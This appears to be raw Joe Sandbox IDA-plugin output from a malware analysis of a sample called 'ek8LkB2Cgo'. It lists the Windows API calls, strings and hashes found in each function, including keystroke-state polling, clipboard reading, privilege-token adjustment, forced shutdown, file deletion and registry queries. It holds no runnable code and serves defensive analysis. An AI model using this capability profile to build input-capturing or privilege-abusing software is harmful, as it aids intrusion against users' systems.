                                                                                  • Instruction Fuzzy Hash: FCE0CD775001245BC7119654DC46FFA77ADDFC8694F050075F909E7244D97499C196A0
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 015F75F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1318668522.00000000015F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F5000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_15f5000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                  • Instruction ID: 7d4285b6cd0cfb760ae9cd5e49482241796554e5cc9a34d96092b38047002aa7
                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                  • Instruction Fuzzy Hash: 90E0BF7494010D9FDB00DFA8D54969D7BB4EF04701F1005A5FD0192281D67099508A62
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0055B1CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: %d/%02d/%02d
                                                                                  • API String ID: 3850602802-328681919
                                                                                  • Opcode ID: c4ccf3ecb489a61dab36a23ace1c0adb94389e32a7a8aa158fc9bdf78d99a67c
                                                                                  • Instruction ID: 6cd57e020466730660ed7e0ebb89e152fa0167d53648bb470457b76b2d7bc25f
                                                                                  • Opcode Fuzzy Hash: c4ccf3ecb489a61dab36a23ace1c0adb94389e32a7a8aa158fc9bdf78d99a67c
                                                                                  • Instruction Fuzzy Hash: 2F12EC71500609AFEB249F24DC69FAE7FB8FF84311F10421AFD19AA2D0DB708949DB61
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 0050EB4A
                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00563AEA
                                                                                  • IsIconic.USER32(000000FF), ref: 00563AF3
                                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 00563B00
                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00563B0A
                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00563B20
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00563B27
                                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00563B33
                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00563B44
                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00563B4C
                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00563B54
                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00563B57
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00563B6C
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00563B77
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00563B81
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00563B86
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00563B8F
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00563B94
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00563B9E
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00563BA3
                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00563BA6
                                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00563BCD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                  • String ID: Shell_TrayWnd
                                                                                  • API String ID: 4125248594-2988720461
                                                                                  • Opcode ID: 4b2cc07f1120a6d271646af7257928dbb0442e4b74d8e6d3a9516e54f3c1d4ad
                                                                                  • Instruction ID: 36e6da66723b48544f9988959d716108b1e2c00b76712d04c2736093f9052037
                                                                                  • Opcode Fuzzy Hash: 4b2cc07f1120a6d271646af7257928dbb0442e4b74d8e6d3a9516e54f3c1d4ad
                                                                                  • Instruction Fuzzy Hash: 35316171A40218BBEB206BA59C4AF7F7E7CEF54B50F104015FA09EB1E0DAB15D44BAB0
                                                                                  APIs
                                                                                    • Part of subcall function 0052B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0052B180
                                                                                    • Part of subcall function 0052B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0052B1AD
                                                                                    • Part of subcall function 0052B134: GetLastError.KERNEL32 ref: 0052B1BA
                                                                                  • _memset.LIBCMT ref: 0052AD08
                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0052AD5A
                                                                                  • CloseHandle.KERNEL32(?), ref: 0052AD6B
                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0052AD82
                                                                                  • GetProcessWindowStation.USER32 ref: 0052AD9B
                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 0052ADA5
                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0052ADBF
                                                                                    • Part of subcall function 0052AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0052ACC0), ref: 0052AB99
                                                                                    • Part of subcall function 0052AB84: CloseHandle.KERNEL32(?,?,0052ACC0), ref: 0052ABAB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                  • String ID: $H*Z$default$winsta0
                                                                                  • API String ID: 2063423040-737746828
                                                                                  • Opcode ID: 52a47bb7c67102ce031efc20df742c601223dd2661b037ba8f04ab53232a7f70
                                                                                  • Instruction ID: 46178f1f2bb8a9c114c7f03389c1f3219d2b6cd899b1751c522b6e1ab08fa742
                                                                                  • Instruction Fuzzy Hash: 4981AC71800219AFDF219FA4EC49AEEBFB8FF1A304F044119F814A61A1D7718E95EB61
                                                                                  APIs
                                                                                    • Part of subcall function 00536EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00535FA6,?), ref: 00536ED8
                                                                                    • Part of subcall function 00536EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00535FA6,?), ref: 00536EF1
                                                                                    • Part of subcall function 0053725E: __wsplitpath.LIBCMT ref: 0053727B
                                                                                    • Part of subcall function 0053725E: __wsplitpath.LIBCMT ref: 0053728E
                                                                                    • Part of subcall function 005372CB: GetFileAttributesW.KERNEL32(?,00536019), ref: 005372CC
                                                                                  • _wcscat.LIBCMT ref: 00536149
                                                                                  • _wcscat.LIBCMT ref: 00536167
                                                                                  • __wsplitpath.LIBCMT ref: 0053618E
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 005361A4
                                                                                  • _wcscpy.LIBCMT ref: 00536209
                                                                                  • _wcscat.LIBCMT ref: 0053621C
                                                                                  • _wcscat.LIBCMT ref: 0053622F
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0053625D
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0053626E
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00536289
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00536298
                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 005362AD
                                                                                  • DeleteFileW.KERNEL32(?), ref: 005362BE
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 005362E1
                                                                                  • FindClose.KERNEL32(00000000), ref: 005362FD
                                                                                  • FindClose.KERNEL32(00000000), ref: 0053630B
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 1917200108-1173974218
                                                                                  • Opcode ID: c2988175a8b2eeb1b57e79cd6ce8c9ed683beed787bbc8f5ea4bc08485a6ff71
                                                                                  • Instruction ID: 8fcf2f25cc62369382e848ace5d9172cd026441a0b6ee183874dfb6d54696fbe
                                                                                  • Instruction Fuzzy Hash: FD514EB680811D6ACB21EB91DC48DDBBBBCBF15300F0544EAE549E3041DE7697899FA4
                                                                                  APIs
                                                                                  • OpenClipboard.USER32(0058DC00), ref: 00546B36
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00546B44
                                                                                  • GetClipboardData.USER32(0000000D), ref: 00546B4C
                                                                                  • CloseClipboard.USER32 ref: 00546B58
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00546B74
                                                                                  • CloseClipboard.USER32 ref: 00546B7E
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00546B93
                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00546BA0
                                                                                  • GetClipboardData.USER32(00000001), ref: 00546BA8
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00546BB5
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00546BE9
                                                                                  • CloseClipboard.USER32 ref: 00546CF6
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                  • String ID:
                                                                                  • API String ID: 3222323430-0
                                                                                  • Opcode ID: 72bd08dbcc16ba7085d1b8993bba6036ffea654c701e2a7097959d72782a447a
                                                                                  • Instruction ID: 834ab8d5e373898ef227e24379e910db8638a8361b8a49735ff76cc9ab55b1ea
                                                                                  • Instruction Fuzzy Hash: 0751A2312002066BD300AF61ED86FBE7BB8FF95B15F00042DF64AD61D1DF60E849AA62
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0053F62B
                                                                                  • FindClose.KERNEL32(00000000), ref: 0053F67F
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0053F6A4
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0053F6BB
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0053F6E2
                                                                                  • __swprintf.LIBCMT ref: 0053F72E
                                                                                  • __swprintf.LIBCMT ref: 0053F767
                                                                                  • __swprintf.LIBCMT ref: 0053F7BB
                                                                                    • Part of subcall function 0051172B: __woutput_l.LIBCMT ref: 00511784
                                                                                  • __swprintf.LIBCMT ref: 0053F809
                                                                                  • __swprintf.LIBCMT ref: 0053F858
                                                                                  • __swprintf.LIBCMT ref: 0053F8A7
                                                                                  • __swprintf.LIBCMT ref: 0053F8F6
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                  • API String ID: 835046349-2428617273
                                                                                  • Opcode ID: 0962b84eccde80461b9d0554b1c3fcba1da416fdab74775a491c2b88b5616643
                                                                                  • Instruction ID: 00307fe591bd3f9d4618b4020efa666f20a9b043f2e04841b6116adf26c60604
                                                                                  • Instruction Fuzzy Hash: DEA10EB2408345ABD314EB95C985DBFB7ECBF98704F400C2EB68587192EB34D949CB62
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00541B50
                                                                                  • _wcscmp.LIBCMT ref: 00541B65
                                                                                  • _wcscmp.LIBCMT ref: 00541B7C
                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00541B8E
                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00541BA8
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00541BC0
                                                                                  • FindClose.KERNEL32(00000000), ref: 00541BCB
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00541BE7
                                                                                  • _wcscmp.LIBCMT ref: 00541C0E
                                                                                  • _wcscmp.LIBCMT ref: 00541C25
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00541C37
                                                                                  • SetCurrentDirectoryW.KERNEL32(005A39FC), ref: 00541C55
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00541C5F
                                                                                  • FindClose.KERNEL32(00000000), ref: 00541C6C
                                                                                  • FindClose.KERNEL32(00000000), ref: 00541C7C
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1803514871-438819550
                                                                                  • Opcode ID: 8f90f027f98d9b6f9c3747d7e3ab26e04cd251d4040b3e3c43b3de0556b684b0
                                                                                  • Instruction ID: 7a9209abcbcff83c3edff6b5bf83113b10366a18aca62fd0521f3f0258b6235f
                                                                                  • Instruction Fuzzy Hash: 2B31C532541A1A6EDB10AFA0EC8DADE7BBCBF45318F104195F915E3090EB70DEC5DA68
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00541CAB
                                                                                  • _wcscmp.LIBCMT ref: 00541CC0
                                                                                  • _wcscmp.LIBCMT ref: 00541CD7
                                                                                    • Part of subcall function 00536BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00536BEF
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00541D06
                                                                                  • FindClose.KERNEL32(00000000), ref: 00541D11
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00541D2D
                                                                                  • _wcscmp.LIBCMT ref: 00541D54
                                                                                  • _wcscmp.LIBCMT ref: 00541D6B
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00541D7D
                                                                                  • SetCurrentDirectoryW.KERNEL32(005A39FC), ref: 00541D9B
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00541DA5
                                                                                  • FindClose.KERNEL32(00000000), ref: 00541DB2
                                                                                  • FindClose.KERNEL32(00000000), ref: 00541DC2
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1824444939-438819550
                                                                                  • Opcode ID: eb2a0b71e2f38a836adeebb99a68a6945f97626f72e4a10ee7a7c999d3107133
                                                                                  • Instruction ID: 3eca8ba121a45876bc18d4a3c277b9a533cd92f46a814bd1a5e70a6772e0d72a
                                                                                  • Instruction Fuzzy Hash: AD31E572901A1A6ADF10AFA0EC49ADE7FB9BF45328F100551E905A2091DB70DEC5DA68
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                  • API String ID: 2102423945-2023335898
                                                                                  • Opcode ID: 2778c539bf4dadf93eb2ce65ec2c308b80a8d07bc9901cad0954f437003a2eeb
                                                                                  • Instruction ID: 9fb56ddbb77d939a67f67d6874ef4844ac1483f2a6d670deb3d8f70e052fea95
                                                                                  • Instruction Fuzzy Hash: B482D071D04219CBCF24CF98D8807BEBBB1BF44314F25816AD919AB391E738AD85CB94
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?), ref: 005409DF
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 005409EF
                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005409FB
                                                                                  • __wsplitpath.LIBCMT ref: 00540A59
                                                                                  • _wcscat.LIBCMT ref: 00540A71
                                                                                  • _wcscat.LIBCMT ref: 00540A83
                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00540A98
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00540AAC
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00540ADE
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00540AFF
                                                                                  • _wcscpy.LIBCMT ref: 00540B0B
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00540B4A
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                  • String ID: *.*
                                                                                  • API String ID: 3566783562-438819550
                                                                                  • Opcode ID: 32d3aedd53c510892db6f732699a7fca09291235de0b4c80f764ac52e822a17e
                                                                                  • Instruction ID: ec1756b2ca2981b4aef5fec9106f6bd0b78bf947abba3f4480114a53c68d2da0
                                                                                  • Instruction Fuzzy Hash: 37617B725043059FD710EF60C8449AEB7E8FF89318F14891EFA89C7292DB35E949CB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Y$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv$YYY Y
                                                                                  • API String ID: 0-3025411547
                                                                                  APIs
                                                                                    • Part of subcall function 0052ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0052ABD7
                                                                                    • Part of subcall function 0052ABBB: GetLastError.KERNEL32(?,0052A69F,?,?,?), ref: 0052ABE1
                                                                                    • Part of subcall function 0052ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0052A69F,?,?,?), ref: 0052ABF0
                                                                                    • Part of subcall function 0052ABBB: HeapAlloc.KERNEL32(00000000,?,0052A69F,?,?,?), ref: 0052ABF7
                                                                                    • Part of subcall function 0052ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0052AC0E
                                                                                    • Part of subcall function 0052AC56: GetProcessHeap.KERNEL32(00000008,0052A6B5,00000000,00000000,?,0052A6B5,?), ref: 0052AC62
                                                                                    • Part of subcall function 0052AC56: HeapAlloc.KERNEL32(00000000,?,0052A6B5,?), ref: 0052AC69
                                                                                    • Part of subcall function 0052AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0052A6B5,?), ref: 0052AC7A
                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0052A6D0
                                                                                  • _memset.LIBCMT ref: 0052A6E5
                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0052A704
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0052A715
                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0052A752
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0052A76E
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0052A78B
                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0052A79A
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0052A7A1
                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0052A7C2
                                                                                  • CopySid.ADVAPI32(00000000), ref: 0052A7C9
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0052A7FA
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0052A820
                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0052A834
                                                                                  Similarity
                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3996160137-0
                                                                                  APIs
                                                                                    • Part of subcall function 00536EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00535FA6,?), ref: 00536ED8
                                                                                    • Part of subcall function 005372CB: GetFileAttributesW.KERNEL32(?,00536019), ref: 005372CC
                                                                                  • _wcscat.LIBCMT ref: 00536441
                                                                                  • __wsplitpath.LIBCMT ref: 0053645F
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00536474
                                                                                  • _wcscpy.LIBCMT ref: 005364A3
                                                                                  • _wcscat.LIBCMT ref: 005364B8
                                                                                  • _wcscat.LIBCMT ref: 005364CA
                                                                                  • DeleteFileW.KERNEL32(?), ref: 005364DA
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 005364EB
                                                                                  • FindClose.KERNEL32(00000000), ref: 00536506
                                                                                  Similarity
                                                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 2643075503-1173974218
                                                                                  APIs
                                                                                    • Part of subcall function 00553C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00552BB5,?,?), ref: 00553C1D
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0055328E
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0055332D
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005533C5
                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00553604
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00553611
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1240663315-0
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 00532B5F
                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00532BE0
                                                                                  • GetKeyState.USER32(000000A0), ref: 00532BFB
                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00532C15
                                                                                  • GetKeyState.USER32(000000A1), ref: 00532C2A
                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00532C42
                                                                                  • GetKeyState.USER32(00000011), ref: 00532C54
                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00532C6C
                                                                                  • GetKeyState.USER32(00000012), ref: 00532C7E
                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00532C96
                                                                                  • GetKeyState.USER32(0000005B), ref: 00532CA8
                                                                                  Similarity
                                                                                  • API ID: State$Async$Keyboard
                                                                                  • String ID:
                                                                                  • API String ID: 541375521-0
                                                                                  Similarity
                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1737998785-0
                                                                                  APIs
                                                                                    • Part of subcall function 00529ABF: CLSIDFromProgID.OLE32 ref: 00529ADC
                                                                                    • Part of subcall function 00529ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00529AF7
                                                                                    • Part of subcall function 00529ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00529B05
                                                                                    • Part of subcall function 00529ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00529B15
                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0054C235
                                                                                  • _memset.LIBCMT ref: 0054C242
                                                                                  • _memset.LIBCMT ref: 0054C360
                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0054C38C
                                                                                  • CoTaskMemFree.OLE32(?), ref: 0054C397
                                                                                  Strings
                                                                                  • NULL Pointer assignment, xrefs: 0054C3E5
                                                                                  Similarity
                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                  • String ID: NULL Pointer assignment
                                                                                  • API String ID: 1300414916-2785691316
                                                                                  APIs
                                                                                    • Part of subcall function 0052B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0052B180
                                                                                    • Part of subcall function 0052B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0052B1AD
                                                                                    • Part of subcall function 0052B134: GetLastError.KERNEL32 ref: 0052B1BA
                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00537A0F
                                                                                  Similarity
                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                  • API String ID: 2234035333-194228
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv$Y
                                                                                  • API String ID: 0-4031888713
                                                                                  • Opcode ID: 24b147b46617ae7aa69ef1485dd0f1bbda64237cf19de69fe9fdf52e8c221eb6
                                                                                  • Instruction ID: 5fe323fd3fb033f6de3ff2e6380821ba1601e43defd325e35e3e1d3e9182a571
                                                                                  • Opcode Fuzzy Hash: 24b147b46617ae7aa69ef1485dd0f1bbda64237cf19de69fe9fdf52e8c221eb6
                                                                                  • Instruction Fuzzy Hash: A5929EB1E0021ACBDF24CF58D8407BEBBB1BB54314F15819AD91AAB380D7789D81DF96
                                                                                  APIs
                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00548CA8
